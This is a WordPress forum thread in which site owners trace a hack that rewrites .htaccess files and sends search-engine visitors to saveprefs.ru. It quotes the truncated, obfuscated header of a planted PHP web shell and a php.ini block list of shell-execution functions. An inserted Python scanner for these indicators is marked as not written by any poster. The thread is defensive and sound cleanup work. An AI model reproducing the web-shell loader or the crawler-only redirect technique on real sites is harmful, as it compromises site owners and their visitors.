• Hi everyone, I have just been hacked. I am a web developer, and have about 20-30 WordPress sites, all of them running 3.3.1. They all seem to have been hacked. Here’s one you can look at, if you search google for harmonyhomes.net and click on the link from Google, you will see that it goes to https://saveprefs.ru/astro/index.php first then to msn.ca. Can anyone please help me find the code? I really don’t want to have to try to restore all my sites from backups.

    Thank you all.

    Jamie

Viewing 15 replies - 16 through 30 (of 98 total)
  • Thread Starter Jamie Edwards

    (@jamieedwards)

    Ok, awesome, thanks impackt, I just noticed that I missed something way down at the bottom of the .htaccess file that was giving a 404 error. I have cleaned out everything that I can find that is obvious in the .htaccess file. I have changed my FTP and my cPanel passwords too.

    I have looked through every folder looking for any unusually named files, but can’t find any. I will keep looking.

    Thanks so much for registering here to help, I appreciate it lots.

    Thread Starter Jamie Edwards

    (@jamieedwards)

    Also, thanks Mickey, I have set the permissions to 444; we’ll see if that stops the files from being overwritten every 30 minutes or so…

    You’re welcome!

    I wish I could tell you what the file name was, but I deleted it the second that I noticed it — it was mostly composed of random numbers.

    I’ll post in a few hours to let you know if my site is still clean

    Thread Starter Jamie Edwards

    (@jamieedwards)

    I saw another post somewhere else tonight that mentioned the same thing. I, however, haven’t seen anything of the sort; also, I would imagine it would have a similar last-modified date to the new corrupted .htaccess file (today’s date). The other post said to look for something with a name like ws2043124.php or something like that. I will keep looking.

    Hello all,

    same issues on my site! I found this post quite useful: https://www.google.com/support/forum/p/Webmasters/thread?tid=7b5bc4f20bf9b3f3&hl=en

    I looked for similar php files and found a lot, e.g.:

    -rw-r--r-- 1 www-data www-data 23289 10. Jan 00:34 w21301478n.php
    -rw-r--r-- 1 www-data www-data 23289 9. Jan 17:14 w37504127n.php
    -rw-r--r-- 1 www-data www-data 23289 9. Jan 21:46 w50631636n.php
    -rw-r--r-- 1 www-data www-data 23289 10. Jan 00:25 w69768580n.php
    -rw-r--r-- 1 www-data www-data 23289 16. Jan 11:44 w11756090n.php
    -rw-r--r-- 1 www-data www-data 23289 9. Jan 21:46 w12586317n.php
    -rw-r--r-- 1 www-data www-data 23289 16. Jan 11:46 w15008865n.php
    -rw-r--r-- 1 www-data www-data 23289 16. Jan 11:25 w17778828n.php
    -rw-r--r-- 1 www-data www-data 23289 16. Jan 11:46 w25746672n.php
    -rw-r--r-- 1 www-data www-data 23289 16. Jan 12:03 w25862560n.php
    -rw-r--r-- 1 www-data www-data 23289 16. Jan 11:36 w40138369n.php

    and much more.

    Unfortunately, I couldn’t understand the content. It starts with:

    <?php $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;$default_charset="Windows-1251";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJk …

    If anybody is interested in such a file for diagnostics, I could send it by email.

    What I have done so far is:

    – Checking for unknown system users (there weren’t any)
    – Changing all system passwords (root and users)
    – Changing the mysql root password
    – Changing all mysql user passwords

    I realized that every few minutes the .htaccess files get updated. My plan now is:

    – to identify all w????????n.php files and delete them (all are under the Apache DocumentRoot).
    – to delete unnecessary .htaccess files or delete unwanted content in these .htaccess files.
    – to check whether the updating of .htaccess files continues or has stopped.

    Keep fingers crossed that this will help!

    Funny thing that php-ids.org is hacked too.

    The code that you posted decodes to:

    eval(gzinflate(base64_decode('7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJk …

    which means: execute some shit that is zipped in base64.

    P.S.
    @p-mt, could you please upload one of the malicious files from your system to pastebin.com and post the link here. It seems like a mass attack, so we need to know what to expect.

    Hi there, I got the same issues here.. >>>,<
    Have tried most of the things that have been talked about here,
    but until now I still get played by this damn crap hacker….

    :(((

    Hi Old_fart,

    here you can find content of “w11756090n.php”: w11756090n.php

    Thanks, I will take a look at it, but all of you who got this shit need to do the following steps:

    1. locate your php.ini file
    2. replace there
    disable_functions =
    to
    disable_functions = "apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, inject_code, mysql_pconnect, openlog, passthru, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode"
    3. force to restart http server

    do you think WordPress will work after that??

    No search results were found when searching for “w11756090n.php” here..
    Instead I found a suspicious file in my /wp-content/themename/temp folder. The file is named: 303ca5097ae43fd8583179bae0b9aed8.php

    Hi Old_fart, yes I have the same question..

    My site is still clean and passing the test( https://sitecheck.sucuri.net/scanner/ ) since I fixed it 6 hours ago.

    Has anyone else had any luck with my method?

    Just now all my .htaccess files got shitted again with this crap..
    I couldn’t find any more suspicious files..

    Hi impackt, I am sorry.. I still couldn’t understand how to do your method.. All I know is that all the .htaccess files keep getting edited by this shit.. Can you explain it in more detail? I’d really love to try..
    Thanks in advance..

    @p-mt wrote “do you think WordPress will work after that??”

    Mine is working. There could be some plugins that use those functions, but all of them should be avoided. You may search for those functions through all of WordPress’s PHP files, but legitimate applications rarely use those functions.

    @richardlin File names generated by the virus are unique because they are made with the help of a random generator.

    @impackt As I can see from the virus code, it replies with the redirect link to search-engine bots ONLY and obviously will not reveal itself to a well-known scanner. sitecheck.sucuri.net can only check the output produced by the PHP code; it can’t examine your file system. You can download the Firefox plugin “User Agent Switcher” and check your site with the user agent set to “Google”, “Slurp”, “MSNBot”, “ia_archiver”, “Yandex” or “Rambler”.
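    As an added example (not posted by anyone in this thread), a small Python scanner for the two artifacts discussed above: the hex-escaped preg_replace/eval loader shown in the file header earlier in the thread, and .htaccess rewrites that only fire for crawler user agents, which is why a normal scanner sees a clean site. The sample file contents and host names below are constructed, not taken from a real infection.

```python
import re

# Constructed sample modelled on the header quoted in the thread: the hex
# escapes spell out eval(gzinflate(base64_decode( and are run via /e.
SAMPLE_PHP = r'''<?php $auth_pass="";$default_action="FilesMan";preg_replace("/.*/e",
"\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'...'\x29\x29\x29\x3B","");'''

# Constructed .htaccess: the redirect applies only to crawler user agents.
SAMPLE_HTACCESS = """RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|slurp|msnbot|yandex) [NC]
RewriteRule ^(.*)$ http://malicious.example/astro/index.php [R=301,L]
RewriteRule ^index\\.php$ - [L]
RewriteRule . /index.php [L]
"""

def decode_hex_escapes(src: str) -> str:
    """Turn PHP \\xNN escapes back into characters so hidden names read plainly."""
    return re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), src)

PHP_INDICATORS = {
    "preg_replace_e": re.compile(r'''preg_replace\s*\(\s*["'][^"']*/e["']'''),
    "eval_gzinflate_b64": re.compile(r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\("),
    "filesman_shell": re.compile(r'''\$default_action\s*=\s*["']FilesMan["']'''),
}
RANDOM_NAME = re.compile(r"^w\d{8}n\.php$")  # naming pattern from the listing above

def scan_php_source(src: str) -> list[str]:
    """Return the indicator names found after de-obfuscating hex escapes."""
    decoded = decode_hex_escapes(src)
    return [name for name, rx in PHP_INDICATORS.items() if rx.search(decoded)]

BOT_UA = re.compile(r"HTTP_USER_AGENT.*(google|slurp|msnbot|yandex|ia_archiver|rambler)", re.I)
REDIRECT_RULE = re.compile(r"^RewriteRule\s+\S+\s+(https?://([^/\s]+)\S*)", re.I)

def scan_htaccess(text: str, own_hosts: set[str]) -> list[str]:
    """Return off-site redirect targets that apply only when a crawler UA matched."""
    hits, bot_cond = [], False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("RewriteCond"):
            bot_cond = bot_cond or bool(BOT_UA.search(line))
            continue
        m = REDIRECT_RULE.match(line)
        if m and bot_cond and m.group(2).lower() not in own_hosts:
            hits.append(m.group(1))
        if line.startswith("RewriteRule"):
            bot_cond = False  # RewriteCond lines only apply to the next RewriteRule
    return hits

if __name__ == "__main__":
    print(scan_php_source(SAMPLE_PHP))
    print(scan_htaccess(SAMPLE_HTACCESS, {"www.example.com"}))
```

    Run it over every .php and .htaccess under DocumentRoot and compare the hits against the legitimate WordPress permalink rules; a redirect that is gated on a crawler user agent and points at a host you do not own is the cloaking behaviour Old_fart describes.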

    I got this problem too.
    As a temporary solution:
    – delete the infected .htaccess file.
    – create another .htaccess file with the rules WordPress uses for permalinks.
    – change the CHMOD of this file to 444 so no one can edit it, not even a shitty script!

  • The topic ‘3.3.1 Hacked by saveprefs.ru redirect’ is closed to new replies.